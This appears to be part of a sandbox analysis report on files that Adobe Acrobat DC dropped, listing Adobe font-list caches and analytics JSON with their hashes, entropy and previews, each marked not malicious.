                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:B60EE534029885BD6DECA42D1263BDC0
                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6744

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):10880
                          Entropy (8bit):5.214360287289079
                          Encrypted:false
                          SSDEEP:
                          MD5:B60EE534029885BD6DECA42D1263BDC0
                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.354723308837573
                          Encrypted:false
                          SSDEEP:
                          MD5:D2AA57A6259632D430E266B068506E0D
                          SHA1:319A26276D135A07F44B495FF33E93DE34F7BA47
                          SHA-256:CC8601F767817E3A925441B533B5348EEEA212CFBCA59FF72FAC243D3552B991
                          SHA-512:7EDC9B2DD29E8955EBBA43B560A80ACD8A031AA2B89EA5C871A0C9B45465D85DCE15BBF4BAB4444EC0DCE3542503F9FEE2C1DE5A1A60C9DD8E68477D28291D25
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.299237470447495
                          Encrypted:false
                          SSDEEP:
                          MD5:EB9E271DCCB4AE8952AA229A3861B2EB
                          SHA1:3D49C54D6953C59D503A69D6F7E45C7B88A08ACC
                          SHA-256:D6B35124D26ED03B1E61D65EEC866AF7F3A2DED7EE4680C486715C197D1A6806
                          SHA-512:FA159A279E5AF65BE2D7793860CC4EEED4CACF57255AFCBAAAA8E8F9FAD78C10EE0EAB3A2B2AC64AC9BCD6DB9DEF4896598A08045B8A919F2CB4081E34BA8AC3
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.279009112155158
                          Encrypted:false
                          SSDEEP:
                          MD5:06139A70E298A329B7CFC68908F4F411
                          SHA1:548F6C1223320CE83ABFB7286F67BB4193E1EC54
                          SHA-256:7841C448E1EBA48B7F4092E3E964DBD77464579ECB40817ADD9CDDC0108983A9
                          SHA-512:73C0CBCB609B8AD9A39738FFBEF70C29A8D5EF3588E0B88ABD5C9A57657BEBA824688B07BD8FB91BE79543DC47F455BD7BC217F8AFA5D5A4B232542A1DA7C9D0
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):285
                          Entropy (8bit):5.342800336965249
                          Encrypted:false
                          SSDEEP:
                          MD5:7A57347BA1649D75D10CA515D97628F4
                          SHA1:FEEDFDE6422FD5F974F0E7A5EE318F3677C29313
                          SHA-256:2B41204313F10003013EBFE1D9C3E9099F5D45531B9D6DDD6EF6597370E1535A
                          SHA-512:49BEE3A5D4398ABCFE762F3D770597BAD5A8337FE57D27AAE45095A876FA3E93603519DEDD39B57BA3225A65095324B17A5C3370DC713EB478E66D46FB07D9FE
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1123
                          Entropy (8bit):5.681815726057597
                          Encrypted:false
                          SSDEEP:
                          MD5:5C2C6411A4BC7E49CADC1A3494EA8A78
                          SHA1:3C64BFB59D858B3027FE4E93447DB94DB98134D6
                          SHA-256:02F1338FBC16A6B3BE8A8545D6F1F50BF81304B48A4BF9CF9CCB9CCF4DB99B98
                          SHA-512:281C9A59A0A987BE0453C3C052BED79CD230574475BFB07B3F4EC5C2E61C3565B4DEE202C83DC6D3BB6896E12F2DA54B1CDDCD57B6E93C94BCECD4E858D530EC
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1122
                          Entropy (8bit):5.67715421240136
                          Encrypted:false
                          SSDEEP:
                          MD5:497D83F5A6EF74B4BF7810EC86D04AF7
                          SHA1:1528611461FA8E7148B504D31B1D2FA03ACF471D
                          SHA-256:459DEB4765D72152A3F1125A4BDB2DF0DC40B81D0AE45F012775CE7E52497002
                          SHA-512:C62977731760D68E280E60BEE6972B442213ED9E58875F51328D34E93A3AF09AAC5DE189D491B64A028C82C4A51A3DD4C216548872AFC18289588A7F113C7ECA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.289753297015938
                          Encrypted:false
                          SSDEEP:
                          MD5:8043C1369FEBEF5C7228072D500F28CE
                          SHA1:C5A6DB946F0B76F0669BED86B1B8979CD1FFC7B0
                          SHA-256:8CCBC06CBBC98E368E5FE04C8D0923FB7CC74A2BEB9E3131F90BD01F0DCFB908
                          SHA-512:49B62582A58E84AC31DBAB9B5DB3E98102FC23E08B5059D87BE2D43808A6329F3F237A521C2A5DBD7EDF51E101201EE2E8E9364B957D441423D0F8EFDBEDDAD1
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1102
                          Entropy (8bit):5.668428569977861
                          Encrypted:false
                          SSDEEP:
                          MD5:532744D55F5A033D7E3BFF3B6D079ADB
                          SHA1:D0345D40534263F95370C280BF6AB93DFF9B202A
                          SHA-256:38601B9F70CDB4D403F33219C769426F3FAB030A1D680AB4DA589893201C17B6
                          SHA-512:A61BBA37E39D59C67244A624FF3F0F299C3E6AC6DB7F7DA4511C3893DBC859AE857B3FC385DFD7F47D36EFA98523F74C0A74B03D81FD5B0E4F98AE1E3A5B41F3
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1164
                          Entropy (8bit):5.696613101711443
                          Encrypted:false
                          SSDEEP:
                          MD5:88ECD6A503FE8FF51B505632A9448C75
                          SHA1:82E3936E2A1E6B67C0CE4DF8334E52E157C7B380
                          SHA-256:848513DE524150345BE3D25265E46488FECAA7C561EC9F2B53FC45ED96AD85CA
                          SHA-512:CD91114F17F75BA543772DF5C806AE0B3ABBE6A401A0CA9F76FFA5758B47AAC0CC1D93A2348B75E22AD6E618E0E0E9B0E463E6DE777B0BC530E4C660F1C7CC27
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.292757788772502
                          Encrypted:false
                          SSDEEP:
                          MD5:2E1785E819D6E5ADE905A34A3F1D3C7F
                          SHA1:5C274C34DFC8380953810377D78B52F2950340FC
                          SHA-256:B7A7E1E23A5CA7420BEA2A16465079CF3978126D65AC5BCA48CE40B71D952284
                          SHA-512:86346D5703F1B8E5E614177B691F4356FEDA898C842D78A2A8F63E8A9ADA9B52D16CCBD1660ADE386C0F77E10792DC5DF9F772CE09B04A6265CED8ED9CE19CDA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):284
                          Entropy (8bit):5.279783600409507
                          Encrypted:false
                          SSDEEP:
                          MD5:EA8D70022B015568FF0544D130C5B590
                          SHA1:D0590D37D853189F243A8BCC1F26DA12294A2AC8
                          SHA-256:4AF9653ADCF72C42F1E859534FEEFC75276771F82624220FD0094E857CAB6E4F
                          SHA-512:4EA64B0238BAC0A164815066C169C386B571D78BF98668EC9D91BD459E5147651D1686DFEEBFD9404BD3F961CC2D5DAA0DE1F9C095B80EB3F0FF4BEBB218FBCA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):291
                          Entropy (8bit):5.276354661093976
                          Encrypted:false
                          SSDEEP:
                          MD5:D2AD69998B12690469087C15C7CF32D7
                          SHA1:78D190148361F9ABFB0F0FD242ADF09634A701CF
                          SHA-256:DC95014BB481AB5054176742E731DA2F2B7CB7C0D0A5D5418A090F0489F1CBA7
                          SHA-512:68B017538FC5A0EAD047CF4F49A723574BFCDFDFBBB3F150E72F1380AAAFF48438A77E0AFDBE7302E90D8DEB3D27A51F37DF0C1F0296501FA04C62FA5AB76694
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):287
                          Entropy (8bit):5.279635738389018
                          Encrypted:false
                          SSDEEP:
                          MD5:F58BAA920F593CEB5B4563EF3ED03287
                          SHA1:9E2963D3689F37EF129837A487AB5657B09E1D44
                          SHA-256:75A335586590C94D6653DDCB86F4E555EB05B4CAB531D3E0F81A532ED2ADAB11
                          SHA-512:299882B912A68DE3637551B9FEB467979C6606033D27373CFA41824B576669C57968CB53353F2539AF51A5195D4E96A33681AD0421A8F9D070FE4EDE3DFBE246
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1090
                          Entropy (8bit):5.65859203691726
                          Encrypted:false
                          SSDEEP:
                          MD5:788D7CC3CA3CDF8C6B114A7DDDD934DB
                          SHA1:38C4EE6EA1F90676262FC1376CF5499322CB3BEF
                          SHA-256:7F61B086D1F9569A0DC89E85A1340C93200E5D432053ABE9A65416D356DEFDDF
                          SHA-512:F0551B25D6A834BA1E7B8C533A79E3839C49DF3E6AFFC07A5E6B88EFF4AAD1472AF9B98F0FD6FCF3C40DDBFA9D1F46445BBCA5E51DF7525F30032668A91DC7C8
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):5.256045474033808
                          Encrypted:false
                          SSDEEP:
                          MD5:7A1B76D5D9465E7B912EEDAFEDEC88C6
                          SHA1:CC9D95A38A24A0E858D8A640D4050E7B6FB1399F
                          SHA-256:91EC0524EB3D8AA02F8DC04AC729D6D2B86F194BAC5BE392DC292DB552DBA1EB
